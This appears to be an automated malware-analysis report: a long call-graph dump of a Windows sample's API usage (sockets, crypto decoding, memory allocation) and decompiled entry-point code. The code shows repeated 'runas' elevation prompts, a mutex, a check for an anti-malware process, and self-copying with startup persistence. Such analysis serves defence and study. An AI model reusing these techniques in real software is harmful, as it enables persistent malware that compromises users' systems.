40619b 6239->6240 6240->6170 6240->6240 6242 4030d9 6241->6242 6247 4030ff 6241->6247 6243 406698 GetPEB 6242->6243 6244 4030f4 6243->6244 6245 406788 GetPEB 6244->6245 6245->6247 6246 406698 GetPEB 6248 40312d 6246->6248 6247->6246 6256 403138 6247->6256 6251 406788 GetPEB 6248->6251 6249 406698 GetPEB 6254 403157 6249->6254 6250 406698 GetPEB 6255 403194 6250->6255 6251->6256 6252 4031b4 6252->6179 6253 40319f 6253->6252 6257 40609e GetPEB 6253->6257 6258 406788 GetPEB 6254->6258 6259 406788 GetPEB 6255->6259 6256->6249 6260 403162 6256->6260 6257->6252 6258->6260 6259->6253 6260->6250 6260->6253 6261->6074 6262->6076 6264 4060fb 6263->6264 6265 406106 getaddrinfo 6264->6265 6266 402849 inet_ntoa 6265->6266 6267 406130 6265->6267 6266->6079 6267->6266 6268 406141 freeaddrinfo 6267->6268 6268->6266 6270 4028bf select 6269->6270 6270->6083 6270->6087 6272 403f3a 6271->6272 6273 403f40 WaitForSingleObject 6272->6273 6277 403f4a 6272->6277 6273->6277 6274 404037 6275 404045 6274->6275 6276 40403d SetEvent 6274->6276 6275->6104 6276->6275 6277->6274 6278 403616 GetPEB 6277->6278 6279 404224 8 API calls 6277->6279 6278->6277 6279->6277 6280->6135 6282 405ba4 6281->6282 6283 405bca 7 API calls 6282->6283 6284 405c82 GetMessageA TranslateMessage DispatchMessageA 6283->6284 6284->6284 6297 406259 6285->6297 6287 405958 GetWindowThreadProcessId GetCurrentProcessId 6288 405ab7 6287->6288 6289 405978 GetClassNameA GetWindowTextA 6287->6289 6289->6288 6290 4059a8 6289->6290 6290->6288 6291 4059f3 6290->6291 6292 405a0d SendMessageA OpenProcess 6291->6292 6292->6288 6293 405a49 GetModuleFileNameExA 6292->6293 6293->6288 6294 405a6c Sleep DeleteFileA 6293->6294 6294->6288 6295 405a86 6294->6295 6295->6288 6296 405aa2 RemoveDirectoryA 6295->6296 6296->6288 6297->6287 6298 40f7a0 6299 40f7c0 6298->6299 6302 40f550 6299->6302 6301 40f848 6303 40f573 GlobalAlloc 6302->6303 6306 40f748 6303->6306 6308 40d980 VirtualProtect 6306->6308 6307 40f76d 6307->6301 6308->6307 6445 401dc1 6476 40144d 6445->6476 6446 40609e GetPEB 6447 4026cf 6446->6447 6448 40605d GetPEB 6447->6448 6449 402706 CryptReleaseContext 6448->6449 6450 402733 6449->6450 6451 402719 6449->6451 6452 406698 GetPEB 6450->6452 6453 406698 GetPEB 6451->6453 6454 402744 6452->6454 6455 402728 6453->6455 6456 406788 GetPEB 6454->6456 6457 406788 GetPEB 6455->6457 6458 40274f 6456->6458 6457->6450 6459 406698 GetPEB 6458->6459 6460 402760 6459->6460 6461 406788 GetPEB 6460->6461 6466 40276b 6461->6466 6462 401541 CryptStringToBinaryA 6464 404656 2 API calls 6462->6464 6463 402d52 24 API calls 6463->6476 6464->6476 6465 405ffb 4 API calls 6465->6476 6468 404681 VirtualFree 6466->6468 6467 401574 CryptStringToBinaryA 6467->6476 6469 40278a 6468->6469 6470 404681 VirtualFree 6469->6470 6471 402796 6470->6471 6472 404681 VirtualFree 6471->6472 6474 4027a2 6472->6474 6473 4031be 39 API calls 6473->6476 6477 404681 VirtualFree 6474->6477 6475 404656 VirtualAlloc VirtualFree 6475->6476 6476->6462 6476->6463 6476->6465 6476->6467 6476->6473 6476->6475 6479 403515 8 API calls 6476->6479 6480 404554 7 API calls 6476->6480 6481 40253e select 6476->6481 6482 4016fa inet_addr 6476->6482 6483 401ec3 CryptStringToBinaryA CryptStringToBinaryA 6476->6483 6484 40171d CryptStringToBinaryA CryptStringToBinaryA 6476->6484 6486 40263f inet_addr 6476->6486 6488 403bb4 3 API calls 6476->6488 6489 401854 CryptStringToBinaryA CryptStringToBinaryA 6476->6489 6490 4018a8 CryptDecodeObject 6476->6490 6491 4020eb wsprintfA 6476->6491 6492 401d55 6476->6492 6494 4021b1 select 6476->6494 6495 404359 6 API calls 6476->6495 6496 4030ca GetPEB 6476->6496 6497 406788 GetPEB 6476->6497 6498 404681 VirtualFree 6476->6498 6499 406698 GetPEB 6476->6499 6500 403697 GetPEB 6476->6500 6501 403554 GetPEB 6476->6501 6502 40605d GetPEB 6476->6502 6503 403616 GetPEB 6476->6503 6504 404224 8 API calls 6476->6504 6505 40372e 4 API calls 6476->6505 6478 4027ae 6477->6478 6479->6476 6480->6476 6481->6476 6482->6476 6483->6476 6485 403de9 25 API calls 6484->6485 6485->6476 6487 404224 8 API calls 6486->6487 6487->6476 6488->6476 6489->6476 6490->6476 6493 403616 GetPEB 6491->6493 6492->6446 6493->6476 6494->6476 6495->6476 6496->6476 6497->6476 6498->6476 6499->6476 6500->6476 6501->6476 6502->6476 6503->6476 6504->6476 6505->6476 6506 860005 6511 86092b GetPEB 6506->6511 6508 860030 6513 86003c 6508->6513 6512 860972 6511->6512 6512->6508 6514 860049 6513->6514 6515 860df8 2 API calls 6514->6515 6516 860223 6515->6516 6517 860d90 GetPEB 6516->6517 6518 860238 VirtualAlloc 6517->6518 6519 860265 6518->6519 6520 8602ce VirtualProtect 6519->6520 6522 86030b 6520->6522 6521 860439 VirtualFree 6526 8605f4 LoadLibraryA 6521->6526 6527 8604be 6521->6527 6522->6521 6523 8604e3 LoadLibraryA 6523->6527 6525 8608c7 6526->6525 6527->6523 6527->6526 6744 864443 6745 8642bd 6744->6745 6746 8642cf select 6745->6746 6747 8645a9 3 API calls 6745->6747 6748 864394 6745->6748 6749 864832 VirtualAlloc 6745->6749 6751 86433b 6745->6751 6746->6745 6746->6748 6747->6745 6749->6745 6751->6748 6752 866158 6 API calls 6751->6752 6753 8638e7 6751->6753 6752->6751 6754 8637a4 GetPEB 6753->6754 6755 863903 6754->6755 6756 8637a4 GetPEB 6755->6756 6757 863919 6756->6757 6758 863936 6757->6758 6759 8637a4 GetPEB 6757->6759 6760 86331a GetPEB 6758->6760 6759->6758 6761 863968 6760->6761 6761->6751 6309 860920 TerminateProcess 6528 860001 6529 860005 6528->6529 6530 86092b GetPEB 6529->6530 6531 860030 6530->6531 6532 86003c 8 API calls 6531->6532 6533 860038 6532->6533 6977 402ba7 6978 402bc3 6977->6978 6979 404681 VirtualFree 6978->6979 6980 402bcb 6979->6980 6981 402d52 24 API calls 6980->6981 6982 402be8 6981->6982 6983 402bf0 wsprintfA 6982->6983 6984 402c96 6982->6984 6986 404224 8 API calls 6983->6986 6985 405ffb 4 API calls 6984->6985 6991 402cac 6985->6991 6990 402c25 6986->6990 6987 402d1e 6989 404681 VirtualFree 6987->6989 6988 402c37 select 6988->6984 6988->6990 6994 402d0f 6989->6994 6990->6984 6990->6988 6992 404359 6 API calls 6990->6992 6996 4045e2 2 API calls 6990->6996 6998 404681 VirtualFree 6990->6998 6991->6987 6993 402cd6 VirtualAlloc 6991->6993 6992->6990 6993->6987 6995 402cf4 6993->6995 6997 404681 VirtualFree 6995->6997 6996->6990 6997->6994 6998->6990 6310 405ca9 6311 405cb5 DefWindowProcA 6310->6311 6312 405cc8 6310->6312 6313 405cdc 6311->6313 6314 405708 3 API calls 6312->6314 6316 40688b ExitProcess 6313->6316 6315 405cd2 WSACleanup 6314->6315 6315->6316 6356 865b8c 6357 865ba8 6356->6357 6358 865cbc Sleep 6357->6358 6359 865cd2 6357->6359 6358->6359 6999 864d6d 7004 864d19 6999->7004 7000 864d33 select 7000->7004 7001 864d6b 7002 866158 6 API calls 7001->7002 7003 864e16 7002->7003 7004->7000 7004->7001 7005 866158 6 API calls 7004->7005 7005->7004 6534 864a0a 6537 864a26 6534->6537 6535 864bb6 ioctlsocket 6536 864bdc 6535->6536 6541 864bb1 6535->6541 6538 864bf2 connect 6536->6538 6539 864be2 connect 6536->6539 6537->6535 6537->6541 6540 864c00 6538->6540 6539->6540 6542 864c15 select 6540->6542 6551 866158 6541->6551 6542->6541 6543 864c30 ioctlsocket WSAIoctl 6542->6543 6543->6541 6545 864d6b 6547 866158 6 API calls 6545->6547 6546 864d33 select 6549 864ce9 6546->6549 6548 864e16 6547->6548 6549->6545 6549->6546 6550 866158 6 API calls 6549->6550 6550->6549 6552 866177 6551->6552 6553 866164 6551->6553 6557 86416e 6552->6557 6554 8660d1 2 API calls 6553->6554 6556 866175 6554->6556 6556->6549 6558 86418a 6557->6558 6559 864190 WaitForSingleObject 6558->6559 6561 86419a 6558->6561 6559->6561 6560 864287 6562 864295 6560->6562 6563 86428d SetEvent 6560->6563 6561->6560 6565 864474 3 API calls 6561->6565 6566 863866 6561->6566 6562->6556 6563->6562 6565->6561 6575 86331a 6566->6575 6568 86388b 6569 8638b7 6568->6569 6595 8637a4 6568->6595 6571 8637a4 GetPEB 6569->6571 6572 8638ca 6571->6572 6573 8637a4 GetPEB 6572->6573 6574 8638e0 6573->6574 6574->6561 6576 863329 6575->6576 6582 86334f 6575->6582 6600 8668e8 6576->6600 6578 863344 6604 8669d8 6578->6604 6580 863388 6584 8668e8 GetPEB 6580->6584 6594 8633b2 6580->6594 6581 8668e8 GetPEB 6583 86337d 6581->6583 6582->6580 6582->6581 6586 8669d8 GetPEB 6583->6586 6588 8633a7 6584->6588 6585 8668e8 GetPEB 6589 8633e4 6585->6589 6586->6580 6587 863404 6587->6568 6591 8669d8 GetPEB 6588->6591 6592 8669d8 GetPEB 6589->6592 6591->6594 6593 8633ef 6592->6593 6593->6587 6610 8662ee 6593->6610 6594->6585 6594->6593 6596 8637bd 6595->6596 6597 86385f 6596->6597 6598 8668e8 GetPEB 6596->6598 6599 8669d8 GetPEB 6596->6599 6597->6569 6598->6596 6599->6596 6601 866904 6600->6601 6602 866915 GetPEB 6601->6602 6603 86692a 6602->6603 6603->6578 6606 8669f4 6604->6606 6605 866aca 6605->6582 6606->6605 6607 8668e8 GetPEB 6606->6607 6608 866ac3 6607->6608 6609 8669d8 GetPEB 6608->6609 6609->6605 6613 8662f9 6610->6613 6611 866328 6611->6587 6612 8668e8 GetPEB 6612->6613 6613->6611 6613->6612 6614 8669d8 GetPEB 6613->6614 6614->6613 6339 86092b GetPEB 6340 860972 6339->6340 6378 862df7 6379 862e13 6378->6379 6391 862fa2 6379->6391 6381 862e38 6382 862e40 wsprintfA 6381->6382 6385 862ee6 6381->6385 6402 864474 6382->6402 6384 862e87 select 6384->6385 6388 862e75 6384->6388 6387 862f26 VirtualAlloc 6385->6387 6390 862f44 6385->6390 6387->6390 6388->6384 6388->6385 6407 8645a9 6388->6407 6415 864832 6388->6415 6392 862fbe 6391->6392 6398 863268 6392->6398 6418 862a0b 6392->6418 6394 863016 6394->6398 6427 8660d1 6394->6427 6396 8630a8 6397 8630b0 VirtualAlloc 6396->6397 6397->6398 6401 8630cb 6397->6401 6398->6381 6400 8660d1 2 API calls 6400->6401 6401->6398 6401->6400 6433 8661a4 6401->6433 6405 86448d 6402->6405 6403 8645a2 6403->6388 6404 8644a0 VirtualAlloc 6404->6403 6404->6405 6405->6403 6405->6404 6406 8660d1 2 API calls 6405->6406 6406->6405 6408 8645c2 6407->6408 6409 8645cc VirtualAlloc 6408->6409 6412 8646f2 6409->6412 6414 8645ef 6409->6414 6411 8661a4 select 6411->6414 6412->6388 6413 864832 VirtualAlloc 6413->6414 6414->6411 6414->6412 6414->6413 6439 864868 VirtualAlloc 6414->6439 6416 864868 VirtualAlloc 6415->6416 6417 86484a 6416->6417 6417->6388 6420 862a27 6418->6420 6419 862a9f inet_addr 6421 862b4f 6419->6421 6422 862aad 6419->6422 6420->6419 6421->6394 6423 862ac0 htons ioctlsocket connect 6422->6423 6437 86646f 6423->6437 6426 862b27 ioctlsocket 6426->6421 6428 8660e7 6427->6428 6429 866140 6428->6429 6432 866108 select 6428->6432 6430 866146 SetEvent 6429->6430 6431 86614e 6429->6431 6430->6431 6431->6396 6432->6428 6432->6429 6435 8661c0 6433->6435 6434 8661cb select 6436 8661e0 6434->6436 6435->6434 6436->6401 6438 862b0f select 6437->6438 6438->6421 6438->6426 6440 864888 6439->6440 6440->6414 6709 4041f3 6712 40406d 6709->6712 6710 40407f select 6710->6712 6713 404144 6710->6713 6712->6710 6712->6713 6715 404681 VirtualFree 6712->6715 6717 4040eb 6712->6717 6719 404359 6712->6719 6732 4045e2 6712->6732 6715->6712 6717->6713 6718 405f08 11 API calls 6717->6718 6735 403697 6717->6735 6718->6717 6720 404372 6719->6720 6721 40437c VirtualAlloc 6720->6721 6722 4044a2 6721->6722 6730 40439f 6721->6730 6723 404681 VirtualFree 6722->6723 6724 404530 6723->6724 6726 404681 VirtualFree 6724->6726 6725 405f54 2 API calls 6725->6730 6728 40454a 6726->6728 6727 404618 2 API calls 6727->6730 6728->6712 6729 40441d DecryptMessage 6729->6730 6730->6722 6730->6724 6730->6725 6730->6727 6730->6729 6731 4045e2 2 API calls 6730->6731 6731->6730 6733 404618 2 API calls 6732->6733 6734 4045fa 6733->6734 6734->6712 6736 403554 GetPEB 6735->6736 6737 4036b3 6736->6737 6738 403554 GetPEB 6737->6738 6739 4036c9 6738->6739 6740 403554 GetPEB 6739->6740 6741 4036e6 6739->6741 6740->6741 6742 4030ca GetPEB 6741->6742 6743 403718 6742->6743 6743->6717 6762 861250 6782 8664a9 6762->6782 6764 861269 CreateThread GetModuleFileNameA 6783 865fb8 6764->6783 6976 405b8b 10 API calls 6764->6976 6766 861298 6767 8612f7 GetPEB 6766->6767 6768 86130c 6766->6768 6767->6768 6768->6768 6769 861334 OpenMutexA CreateMutexA 6768->6769 6770 861374 EnumWindows Sleep 6769->6770 6771 861362 6769->6771 6770->6771 6772 861396 6770->6772 6975 40593c 10 API calls 6770->6975 6773 8613f9 Sleep 6771->6773 6791 8648fe 6771->6791 6797 8659f9 6772->6797 6775 866adb ExitProcess 6773->6775 6778 8613a4 GetModuleFileNameA 6808 865b1b 6778->6808 6780 8613c8 CopyFileA 6810 865609 6780->6810 6782->6764 6784 865fd4 6783->6784 6785 86606a 6784->6785 6786 866011 LocalFree LocalAlloc GetTokenInformation 6784->6786 6787 86603a 6784->6787 6785->6766 6786->6787 6788 86603e GetSidSubAuthority 6787->6788 6789 86605a LocalFree CloseHandle 6787->6789 6788->6789 6790 86604e 6788->6790 6789->6785 6790->6789 6792 864932 6791->6792 6793 864917 Sleep 6792->6793 6794 864936 6792->6794 6793->6792 6796 8649f4 Sleep 6794->6796 6820 864e35 6794->6820 6796->6794 6799 865a15 6797->6799 6798 8613a0 6798->6773 6798->6778 6799->6798 6800 8668e8 GetPEB 6799->6800 6801 865a6a 6800->6801 6802 8669d8 GetPEB 6801->6802 6804 865a75 6802->6804 6803 865b06 CloseHandle 6803->6798 6804->6803 6805 865ad1 6804->6805 6806 8668e8 GetPEB 6804->6806 6807 8669d8 GetPEB 6804->6807 6805->6803 6806->6804 6807->6804 6809 865b33 6808->6809 6809->6780 6811 865624 6810->6811 6812 86563b CoInitialize 6811->6812 6813 865655 6812->6813 6814 865fb8 6 API calls 6813->6814 6819 865821 6813->6819 6815 865705 6814->6815 6816 8657cb GetLocalTime SystemTimeToFileTime 6815->6816 6815->6819 6817 8657f5 6816->6817 6818 8657fa FileTimeToSystemTime 6816->6818 6817->6818 6818->6819 6819->6773 6821 864e51 6820->6821 6822 864e6a VirtualAlloc 6821->6822 6823 864e88 VirtualAlloc 6821->6823 6824 864e85 6822->6824 6825 865140 6822->6825 6823->6825 6826 864ea3 6823->6826 6824->6823 6827 8662ee GetPEB 6825->6827 6830 864f73 6826->6830 6846 864ec5 6826->6846 6828 86555b 6827->6828 6829 8662ad GetPEB 6828->6829 6831 865568 6829->6831 6832 862a0b 6 API calls 6830->6832 6834 8668e8 GetPEB 6831->6834 6840 865588 6831->6840 6833 864f69 6832->6833 6833->6825 6835 864f8f WSAIoctl 6833->6835 6837 86557d 6834->6837 6838 864ffd 6835->6838 6836 864f33 6867 861408 6836->6867 6839 8669d8 GetPEB 6837->6839 6935 865f33 6838->6935 6839->6840 6840->6840 6844 8655c5 CloseHandle 6840->6844 6849 8655d9 6844->6849 6846->6836 6848 864f1b inet_addr 6846->6848 6848->6836 6850 8655fc 6849->6850 6852 8655f5 ExitProcess 6849->6852 6850->6794 6851 86503b 6853 866158 6 API calls 6851->6853 6863 865079 6853->6863 6854 8650a7 select 6854->6825 6854->6863 6855 8661f7 10 API calls 6855->6863 6856 866158 6 API calls 6856->6863 6857 865368 VirtualAlloc 6857->6825 6857->6863 6858 8660d1 2 API calls 6858->6863 6859 866158 6 API calls 6860 8652bd GetTempPathA 6859->6860 6860->6863 6861 865425 socket 6861->6863 6862 865418 socket 6862->6863 6863->6825 6863->6854 6863->6855 6863->6856 6863->6857 6863->6858 6863->6859 6863->6861 6863->6862 6864 86545a CreateThread 6863->6864 6866 865609 10 API calls 6863->6866 6946 86687b 6863->6946 6864->6863 6950 4047ba 6864->6950 6866->6863 6868 861424 6867->6868 6869 8668e8 GetPEB 6868->6869 6870 861454 6869->6870 6871 8669d8 GetPEB 6870->6871 6872 86145f 6871->6872 6873 8668e8 GetPEB 6872->6873 6874 86147a 6873->6874 6875 8669d8 GetPEB 6874->6875 6876 861485 6875->6876 6877 8668e8 GetPEB 6876->6877 6878 8614a0 6877->6878 6879 8669d8 GetPEB 6878->6879 6880 8614ab 6879->6880 6881 8668e8 GetPEB 6880->6881 6882 8614cc 6881->6882 6883 8669d8 GetPEB 6882->6883 6899 8614d7 6883->6899 6884 8662ee GetPEB 6885 86291f 6884->6885 6887 8662ad GetPEB 6885->6887 6886 862c95 11 API calls 6886->6899 6888 862956 CryptReleaseContext 6887->6888 6889 862983 6888->6889 6890 862969 6888->6890 6891 8668e8 GetPEB 6889->6891 6892 8668e8 GetPEB 6890->6892 6893 862994 6891->6893 6894 862978 6892->6894 6895 8669d8 GetPEB 6893->6895 6896 8669d8 GetPEB 6894->6896 6897 86299f 6895->6897 6896->6889 6898 8668e8 GetPEB 6897->6898 6900 8629b0 6898->6900 6899->6886 6926 861fa5 6899->6926 6932 86168e 6899->6932 6901 8669d8 GetPEB 6900->6901 6902 8629bb 6901->6902 6902->6833 6903 86340e 20 API calls 6903->6932 6904 861791 CryptStringToBinaryA 6906 8648a6 VirtualAlloc 6904->6906 6905 862fa2 10 API calls 6905->6932 6906->6932 6907 86331a GetPEB 6907->6932 6908 8617c4 CryptStringToBinaryA 6908->6932 6909 8648a6 VirtualAlloc 6909->6932 6910 864474 VirtualAlloc select SetEvent 6910->6932 6911 86278e select 6911->6932 6912 8645a9 VirtualAlloc VirtualAlloc select 6912->6932 6913 86194a inet_addr 6913->6932 6914 862113 CryptStringToBinaryA CryptStringToBinaryA 6914->6932 6915 86196d CryptStringToBinaryA CryptStringToBinaryA 6916 864039 12 API calls 6915->6916 6916->6932 6917 863765 VirtualAlloc select SetEvent 6917->6932 6918 863866 GetPEB 6918->6932 6919 86288f inet_addr 6921 864474 3 API calls 6919->6921 6920 8647a4 VirtualAlloc select VirtualAlloc select 6920->6932 6921->6932 6922 861aa4 CryptStringToBinaryA CryptStringToBinaryA 6922->6932 6923 861af8 CryptDecodeObject 6923->6932 6924 86233b wsprintfA 6925 863866 GetPEB 6924->6925 6925->6932 6926->6884 6927 8669d8 GetPEB 6927->6932 6928 862401 select 6928->6932 6929 8668e8 GetPEB 6929->6932 6930 8637a4 GetPEB 6930->6932 6931 8662ad GetPEB 6931->6932 6932->6903 6932->6904 6932->6905 6932->6907 6932->6908 6932->6909 6932->6910 6932->6911 6932->6912 6932->6913 6932->6914 6932->6915 6932->6917 6932->6918 6932->6919 6932->6920 6932->6922 6932->6923 6932->6924 6932->6926 6932->6927 6932->6928 6932->6929 6932->6930 6932->6931 6933 8638e7 GetPEB 6932->6933 6934 86397e GetPEB 6932->6934 6933->6932 6934->6932 6936 865f4f 6935->6936 6937 8668e8 GetPEB 6936->6937 6938 865f6a 6937->6938 6939 8669d8 GetPEB 6938->6939 6940 865002 6939->6940 6941 865f86 6940->6941 6942 8668e8 GetPEB 6941->6942 6943 865f99 6942->6943 6944 8669d8 GetPEB 6943->6944 6945 86500b GetVolumeInformationA 6944->6945 6945->6851 6947 866884 6946->6947 6948 8668b6 SetFilePointer WriteFile CloseHandle 6947->6948 6949 8668e1 6947->6949 6948->6949 6949->6863 6951 4047d6 6950->6951 6952 4060df 2 API calls 6951->6952 6953 40490b 6951->6953 6952->6953 6954 404966 ioctlsocket 6953->6954 6959 404961 6953->6959 6955 40498c 6954->6955 6954->6959 6956 4049a2 connect 6955->6956 6957 404992 connect 6955->6957 6958 4049b0 6956->6958 6957->6958 6960 4049c5 select 6958->6960 6962 405f08 11 API calls 6959->6962 6960->6959 6961 4049e0 ioctlsocket WSAIoctl 6960->6961 6961->6959 6972 404a99 6962->6972 6963 404b1b 6974 40603e shutdown closesocket 6963->6974 6965 404b89 6967 405f08 11 API calls 6965->6967 6966 404ae3 select 6966->6972 6968 404bc6 6967->6968 6970 404681 VirtualFree 6968->6970 6969 404aff recv 6969->6963 6969->6972 6971 404bcf 6970->6971 6972->6963 6972->6966 6972->6969 6973 405f08 11 API calls 6972->6973 6973->6972 6974->6965 6615 862011 6636 86169d 6615->6636 6616 8662ee GetPEB 6617 86291f 6616->6617 6690 8662ad 6617->6690 6620 862983 6622 8668e8 GetPEB 6620->6622 6621 862969 6623 8668e8 GetPEB 6621->6623 6624 862994 6622->6624 6625 862978 6623->6625 6626 8669d8 GetPEB 6624->6626 6627 8669d8 GetPEB 6625->6627 6628 86299f 6626->6628 6627->6620 6629 8668e8 GetPEB 6628->6629 6630 8629b0 6629->6630 6631 8669d8 GetPEB 6630->6631 6638 8629bb 6631->6638 6632 861791 CryptStringToBinaryA 6665 8648a6 6632->6665 6633 862fa2 10 API calls 6633->6636 6635 8617c4 CryptStringToBinaryA 6635->6636 6636->6632 6636->6633 6636->6635 6637 8648a6 VirtualAlloc 6636->6637 6639 863765 VirtualAlloc select SetEvent 6636->6639 6640 86278e select 6636->6640 6641 86194a inet_addr 6636->6641 6642 862113 CryptStringToBinaryA CryptStringToBinaryA 6636->6642 6643 86196d CryptStringToBinaryA CryptStringToBinaryA 6636->6643 6644 86340e 20 API calls 6636->6644 6646 863866 GetPEB 6636->6646 6647 86288f inet_addr 6636->6647 6649 861aa4 CryptStringToBinaryA CryptStringToBinaryA 6636->6649 6650 861af8 CryptDecodeObject 6636->6650 6651 86233b wsprintfA 6636->6651 6652 861fa5 6636->6652 6654 8668e8 GetPEB 6636->6654 6655 862401 select 6636->6655 6656 8645a9 VirtualAlloc VirtualAlloc select 6636->6656 6657 86331a GetPEB 6636->6657 6658 8662ad GetPEB 6636->6658 6659 8669d8 GetPEB 6636->6659 6660 8637a4 GetPEB 6636->6660 6661 864474 VirtualAlloc select SetEvent 6636->6661 6662 8647a4 VirtualAlloc select VirtualAlloc select 6636->6662 6663 8638e7 GetPEB 6636->6663 6674 86397e 6636->6674 6637->6636 6639->6636 6640->6636 6641->6636 6642->6636 6668 864039 6643->6668 6644->6636 6646->6636 6648 864474 3 API calls 6647->6648 6648->6636 6649->6636 6650->6636 6653 863866 GetPEB 6651->6653 6652->6616 6653->6636 6654->6636 6655->6636 6656->6636 6657->6636 6658->6636 6659->6636 6660->6636 6661->6636 6662->6636 6663->6636 6695 8648d1 6665->6695 6667 8648b4 VirtualAlloc 6667->6636 6669 864055 6668->6669 6697 862c95 6669->6697 6671 864155 6671->6636 6672 864092 6672->6671 6673 864137 CryptStringToBinaryA 6672->6673 6673->6671 6675 86399a 6674->6675 6676 86331a GetPEB 6675->6676 6677 8639fd 6675->6677 6689 863b1c 6675->6689 6676->6675 6678 86331a GetPEB 6677->6678 6677->6689 6679 863a2d 6678->6679 6680 86331a GetPEB 6679->6680 6681 863a49 6680->6681 6682 8668e8 GetPEB 6681->6682 6683 863aa9 6682->6683 6684 8669d8 GetPEB 6683->6684 6685 863ab4 6684->6685 6686 8668e8 GetPEB 6685->6686 6687 863b11 6686->6687 6688 8669d8 GetPEB 6687->6688 6688->6689 6689->6636 6693 8662b8 6690->6693 6691 862956 CryptReleaseContext 6691->6620 6691->6621 6692 8668e8 GetPEB 6692->6693 6693->6691 6693->6692 6694 8669d8 GetPEB 6693->6694 6694->6693 6696 8648df 6695->6696 6696->6667 6698 862cb1 6697->6698 6699 862a0b 6 API calls 6698->6699 6700 862cca 6699->6700 6701 862dd1 6700->6701 6702 8660d1 2 API calls 6700->6702 6701->6672 6703 862cfe 6702->6703 6703->6701 6704 8661a4 select 6703->6704 6705 862d3e ioctlsocket 6703->6705 6704->6703 6708 862d5b 6705->6708 6706 864868 VirtualAlloc 6706->6708 6707 8661a4 select 6707->6708 6708->6701 6708->6705 6708->6706 6708->6707 6317 86003c 6318 860049 6317->6318 6332 860df8 SetErrorMode SetErrorMode 6318->6332 6322 860238 VirtualAlloc 6323 860265 6322->6323 6324 8602ce VirtualProtect 6323->6324 6326 86030b 6324->6326 6325 860439 VirtualFree 6330 8605f4 LoadLibraryA 6325->6330 6331 8604be 6325->6331 6326->6325 6327 8604e3 LoadLibraryA 6327->6331 6329 8608c7 6330->6329 6331->6327 6331->6330 6333 860223 6332->6333 6334 860d90 6333->6334 6335 860dad 6334->6335 6336 860db6 6335->6336 6337 860dbb GetPEB 6335->6337 6336->6322 6338 860ddc 6337->6338 6338->6322 6360 404b1d 6370 404ac9 6360->6370 6361 404b1b 6372 40603e shutdown closesocket 6361->6372 6363 404ae3 select 6363->6370 6364 404b89 6366 405f08 11 API calls 6364->6366 6365 404aff recv 6365->6361 6365->6370 6367 404bc6 6366->6367 6368 404681 VirtualFree 6367->6368 6369 404bcf 6368->6369 6370->6361 6370->6363 6370->6365 6371 405f08 11 API calls 6370->6371 6371->6370 6372->6364 6373 865ddb 6374 865df4 6373->6374 6375 865e83 CreateWindowExA 6374->6375 6376 865eca 6375->6376 6377 865ed2 GetMessageA TranslateMessage DispatchMessageA 6376->6377 6377->6377 6341 b11f0e 6342 b11f1d 6341->6342 6345 b126ae 6342->6345 6350 b126c9 6345->6350 6346 b126d2 CreateToolhelp32Snapshot 6347 b126ee Module32First 6346->6347 6346->6350 6348 b126fd 6347->6348 6351 b11f26 6347->6351 6352 b1236d 6348->6352 6350->6346 6350->6347 6353 b12398 6352->6353 6354 b123e1 6353->6354 6355 b123a9 VirtualAlloc 6353->6355 6354->6354 6355->6354 6441 865ef9 6442 865f05 6441->6442 6443 865f18 6441->6443 6444 866adb ExitProcess 6443->6444

                        Control-flow Graph

                        C-Code - Quality: 72%
                        			_entry_() {
                        				char _v772;
                        				char _v1028;
                        				intOrPtr _v1032;
                        				intOrPtr _v1036;
                        				void* _v1040;
                        				char _v1044;
                        				intOrPtr _t28;
                        				intOrPtr _t29;
                        				void* _t36;
                        				void* _t51;
                        				intOrPtr _t53;
                        				short* _t58;
                        				void* _t61;
                        
                        				E00406259( &_v1044, _t61 - _t61 + 0xfffffbf0);
                        				CreateThread(0, 0, E00405B8B, E00405CA9, 0, 0); // executed
                        				GetModuleFileNameA(0,  &_v1028, 0x100); // executed
                        				_t28 = E00405D68(); // executed
                        				_v1032 = _t28;
                        				if(_t28 != 0x1000) {
                        					L5:
                        					_t29 = E00405E22(_t65, "start"); // executed
                        					_v1036 = _t29;
                        					_t30 = _t29;
                        					if(_t29 == 0) {
                        						_t13 = E004065B9(_t30, 4) + 4; // 0x4
                        						_t53 = _t13;
                        						do {
                        							_t31 = E004065B9(_t31, 0x18) + 0x61;
                        							asm("stosb");
                        							_t53 = _t53 - 1;
                        							__eflags = _t53;
                        						} while (__eflags != 0);
                        						L11:
                        						_v1040 = OpenMutexA(0x100000, 0, "llfujo");
                        						CreateMutexA(0, 0, "llfujo"); // executed
                        						if(_v1036 == 0) {
                        							L14:
                        							EnumWindows(E0040593C, 0); // executed
                        							Sleep(0x2710); // executed
                        							_t70 = _v1032 - 0x1000;
                        							if(_v1032 == 0x1000) {
                        								L13:
                        								E004046AE();
                        								goto L14;
                        							}
                        							_t36 = E004057A9(_t70, "a2guard.exe"); // executed
                        							_t71 = _t36;
                        							if(_t36 == 0) {
                        								GetModuleFileNameA(0,  &_v1028, 0x100);
                        								E004058CB(_t71,  &_v772, "llfujo"); // executed
                        								CopyFileA( &_v1028,  &_v772, 0); // executed
                        								E004053B9(_t71, "llfujo", 0,  &_v772, "start", 0, 1); // executed
                        							}
                        							L17:
                        							Sleep(0xea60); // executed
                        							ExitProcess(0); // executed
                        							return CreateWindowExA();
                        						}
                        						if(_v1040 != 0) {
                        							goto L17;
                        						}
                        						goto L13;
                        					}
                        					_t58 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x30));
                        					do {
                        						asm("movsb");
                        						_t58 = _t58 + 1;
                        					} while ( *_t58 != 0x2e);
                        					goto L11;
                        				}
                        				_t51 = 0;
                        				_v1044 = 0xa;
                        				while(_t51 <= 0x20) {
                        					_t65 = _v1044;
                        					if(_v1044 != 0) {
                        						_t51 = ShellExecuteA(0, "runas",  &_v1028, 0, 0, 1);
                        						_t6 =  &_v1044;
                        						 *_t6 = _v1044 - 1;
                        						__eflags =  *_t6;
                        						continue;
                        					}
                        					goto L5;
                        				}
                        				goto L5;
                        			}
















                        0x00401014
                        0x0040102b
                        0x0040103e
                        0x00401043
                        0x00401048
                        0x00401053
                        0x00401093
                        0x00401098
                        0x0040109d
                        0x004010a3
                        0x004010a5
                        0x004010d3
                        0x004010d3
                        0x004010d6
                        0x004010dd
                        0x004010e0
                        0x004010e1
                        0x004010e1
                        0x004010e1
                        0x004010e4
                        0x004010f5
                        0x00401104
                        0x00401110
                        0x00401124
                        0x0040112b
                        0x00401135
                        0x0040113a
                        0x00401144
                        0x0040111f
                        0x0040111f
                        0x00000000
                        0x0040111f
                        0x0040114b
                        0x00401150
